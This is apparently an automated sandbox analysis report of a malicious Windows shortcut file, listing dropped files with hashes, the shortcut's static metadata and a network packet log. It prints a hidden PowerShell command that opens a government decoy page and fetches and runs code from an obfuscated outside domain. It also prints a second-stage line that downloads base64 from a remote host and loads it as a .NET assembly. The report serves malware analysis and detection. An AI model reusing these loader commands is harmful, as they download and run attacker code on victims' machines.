                                                                                                                                                                    SHA1:83B6EB55598CF0DA7FCE2B0C6878220FC38C6753
                                                                                                                                                                    SHA-256:9676112403FD1F3B279F7BFF8265D4409604BD090065D6A8B9B61C0135629C35
                                                                                                                                                                    SHA-512:7921B98A8B4CD0ED0D624D4708519718DC49164BD652E7FBFB9B908A59C0F262365D14A77CAF9D7D9F960F89482DED78AA1EDAF95591783D8B86E78443EFE588
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e.................................,..............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dy3xtur.tes.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5onnppu0.p5k.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pih2ij0y.e4u.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwa5eyqo.qly.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2ivsxxt.i2b.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqjrxfv3.nua.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skze2vw1.cjt.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy3tgymg.3tl.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87aaedf5acf4fa53.customDestinations-ms (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4604
                                                                                                                                                                    Entropy (8bit):3.7970972150752185
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:WHs4W5JYJlFlV+bTRl6eSogZo8JWJallV+bTRlJeSogZo8JWJO1:WplV+bTRWHDlV+bTR7HH
                                                                                                                                                                    MD5:B582DB02B9B67A492AC10BF5CF1E2F6C
                                                                                                                                                                    SHA1:D1E5EAD06D013C6EE248F2FAD7A661F743A09F69
                                                                                                                                                                    SHA-256:E2456ADD19232DB696EBA5189231FA5BD5573DA554B86E65590ACB6F65A2E4EF
                                                                                                                                                                    SHA-512:EE7D818AE3E111E6AEC4E38AE9E917499132AF67460964C50C6A88981A539ECEB84B8F8A1C948164A2EF2C142FB050E2709BE7E2BE179CC84C17A109EAA0BBCF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...................................FL..................F. .. ....n.5a.....s.Y...( ..Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_...1..7a....?n.Y.....j.2.....>YI. .BX7YRZ~1.LNK..N......EW.>>YI............................P..B.X.7.y.R.z.7.X.q.F...l.n.k.......X...............-.......W............?......C:\Users\user\Desktop\BX7yRz7XqF.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......045012...........hT..CrF.f4... .;../Tc...,......hT..CrF.f4... .;../Tc...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....r..`....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.>..Windows.@......OwH>YI.....3.........................W.i.n.d.o.w.s.....Z.1.....>YF..

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q2JYBAOS0TXVRHO4L8V8.temp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4604
                                                                                                                                                                    Entropy (8bit):3.7970972150752185
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:WHs4W5JYJlFlV+bTRl6eSogZo8JWJallV+bTRlJeSogZo8JWJO1:WplV+bTRWHDlV+bTR7HH
                                                                                                                                                                    MD5:B582DB02B9B67A492AC10BF5CF1E2F6C
                                                                                                                                                                    SHA1:D1E5EAD06D013C6EE248F2FAD7A661F743A09F69
                                                                                                                                                                    SHA-256:E2456ADD19232DB696EBA5189231FA5BD5573DA554B86E65590ACB6F65A2E4EF
                                                                                                                                                                    SHA-512:EE7D818AE3E111E6AEC4E38AE9E917499132AF67460964C50C6A88981A539ECEB84B8F8A1C948164A2EF2C142FB050E2709BE7E2BE179CC84C17A109EAA0BBCF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...................................FL..................F. .. ....n.5a.....s.Y...( ..Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_...1..7a....?n.Y.....j.2.....>YI. .BX7YRZ~1.LNK..N......EW.>>YI............................P..B.X.7.y.R.z.7.X.q.F...l.n.k.......X...............-.......W............?......C:\Users\user\Desktop\BX7yRz7XqF.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......045012...........hT..CrF.f4... .;../Tc...,......hT..CrF.f4... .;../Tc...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....r..`....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.>..Windows.@......OwH>YI.....3.........................W.i.n.d.o.w.s.....Z.1.....>YF..

                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                    Chrome Cache Entry: 76

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                    Entropy (8bit):4.801811297153848
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+
                                                                                                                                                                    MD5:91B69177B0962BD96D0259982F719C13
                                                                                                                                                                    SHA1:2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A
                                                                                                                                                                    SHA-256:AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5
                                                                                                                                                                    SHA-512:B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    URL:https://pmo.gov.pk/favicon.ico
                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator at . root@localhost to inform them of the time this error occurred,. and the actions you performed just before this error.</p>.<p>More information about this error may be available.in the server error log.</p>.</body></html>.

                                                                                                                                                                    Chrome Cache Entry: 77

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):527
                                                                                                                                                                    Entropy (8bit):4.801811297153848
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+
                                                                                                                                                                    MD5:91B69177B0962BD96D0259982F719C13
                                                                                                                                                                    SHA1:2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A
                                                                                                                                                                    SHA-256:AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5
                                                                                                                                                                    SHA-512:B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    URL:https://pmo.gov.pk/site/404
                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator at . root@localhost to inform them of the time this error occurred,. and the actions you performed just before this error.</p>.<p>More information about this error may be available.in the server error log.</p>.</body></html>.

                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):231
                                                                                                                                                                    Entropy (8bit):5.273389443785072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:3P2XIpsTAWKCsu2xKvGCg1L3ppNaA3gYZzI/HLN1:f2XIpsT7KC2egd3pjZdZE/rr
                                                                                                                                                                    MD5:118DB1A61CD4AE2687BDDD46AC20E9D4
                                                                                                                                                                    SHA1:8D5699C55E1E5D343B3A5E3CC7F822FB2F8E594E
                                                                                                                                                                    SHA-256:962BC1D758BBAA354CC24AB8238BB7CA328A80E16A850B95C3305C1839E48928
                                                                                                                                                                    SHA-512:677EB0C35139D42A33DFDF2D45F405940399E4BE1E36922C827FA094341E3DC6B41FBCBFD7DD25CCEC582D5ADA7BCBDDBBBEC70013774C66A0EC13A24B038EB9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:$string = irm ('http://cloud.dellicon.top/1000/500/'); $bytees = [System.Convert]::FromBase64String($string.Replace('^','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('UpdateMe');...

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed Feb 14 17:37:15 2024, mtime=Sun Jun 30 05:37:40 2024, atime=Wed Feb 14 17:37:15 2024, length=455680, window=hidenormalshowminimized
                                                                                                                                                                    Entropy (8bit):4.375620491491154
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                    File name:BX7yRz7XqF.lnk
                                                                                                                                                                    File size:2'033 bytes
                                                                                                                                                                    MD5:b642cbf2d292b2e92d5038e6dfbd2de7
                                                                                                                                                                    SHA1:4f92090113a65f13fa6ad128c7e492984a99d294
                                                                                                                                                                    SHA256:7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877
                                                                                                                                                                    SHA512:a2a92f80509e1148a69d8a546d3b7962a4a7a32093fe282c813482f0e58d8b66773df020af89b83510de49357ed6fc6e013ce9f25fa5bb24723aa5e7a1508b2f
                                                                                                                                                                    SSDEEP:48:8saJgIslLzKQX6RpyvKaRsaRBW3rat74:8fg5XKQwYy6JXGu7
                                                                                                                                                                    TLSH:C6418B1427F61708F2F38B3EA8B76211493F7809C975DBCE026C91440B67551E866F3B
                                                                                                                                                                    File Content Preview:L..................F.... ....D7.t_..!.'$......A.t_...............................P.O. .:i.....+00.../C:\...................V.1......X.h..Windows.@........OwH.X.2...........................~..W.i.n.d.o.w.s.....Z.1......XR7..System32..B........OwH.X.2......

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:74f4f4dcece9e9ed

                                                                                                                                                                    Static Windows Shortcut Info

                                                                                                                                                                    General

                                                                                                                                                                    Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Command Line Argument: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell
                                                                                                                                                                    Icon location:%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Sep 30, 2024 18:58:13.156486034 CEST49674443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:13.265799046 CEST49675443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:13.281461000 CEST49672443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:14.031404972 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                    Sep 30, 2024 18:58:17.015873909 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                    Sep 30, 2024 18:58:21.812675953 CEST49671443192.168.2.7204.79.197.203
                                                                                                                                                                    Sep 30, 2024 18:58:22.765790939 CEST49674443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:22.875155926 CEST49675443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:22.890784025 CEST49672443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:22.968899012 CEST49677443192.168.2.720.50.201.200
                                                                                                                                                                    Sep 30, 2024 18:58:25.342677116 CEST44349701104.98.116.138192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:25.342797041 CEST49701443192.168.2.7104.98.116.138
                                                                                                                                                                    Sep 30, 2024 18:58:26.136106014 CEST4970280192.168.2.7172.67.132.65
                                                                                                                                                                    Sep 30, 2024 18:58:26.141036034 CEST8049702172.67.132.65192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.141155005 CEST4970280192.168.2.7172.67.132.65
                                                                                                                                                                    Sep 30, 2024 18:58:26.199614048 CEST4970280192.168.2.7172.67.132.65
                                                                                                                                                                    Sep 30, 2024 18:58:26.204420090 CEST8049702172.67.132.65192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.394411087 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.394460917 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.394524097 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.395026922 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.395042896 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.395452023 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.395551920 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.395622015 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.395839930 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:26.395891905 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:26.976491928 CEST8049702172.67.132.65192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.021898031 CEST4970280192.168.2.7172.67.132.65
                                                                                                                                                                    Sep 30, 2024 18:58:27.582215071 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.583395004 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.583431959 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.584062099 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.584125042 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.584785938 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.584862947 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.585936069 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.586023092 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.586066961 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.627417088 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.640856981 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.640888929 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.741928101 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.988801003 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.988887072 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.988931894 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.989243984 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.990540981 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.990554094 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.991038084 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.991102934 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.991796017 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.991868973 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.993347883 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.993417025 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:27.995891094 CEST49707443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:27.995923042 CEST44349707203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:28.087405920 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:28.087429047 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:28.149235010 CEST49706443192.168.2.7203.101.184.118
                                                                                                                                                                    Sep 30, 2024 18:58:28.546598911 CEST44349706203.101.184.118192.168.2.7
                                                                                                                                                                    Sep 30, 2024 18:58:28.546672106 CEST44349706203.101.184.118192.168.2.7
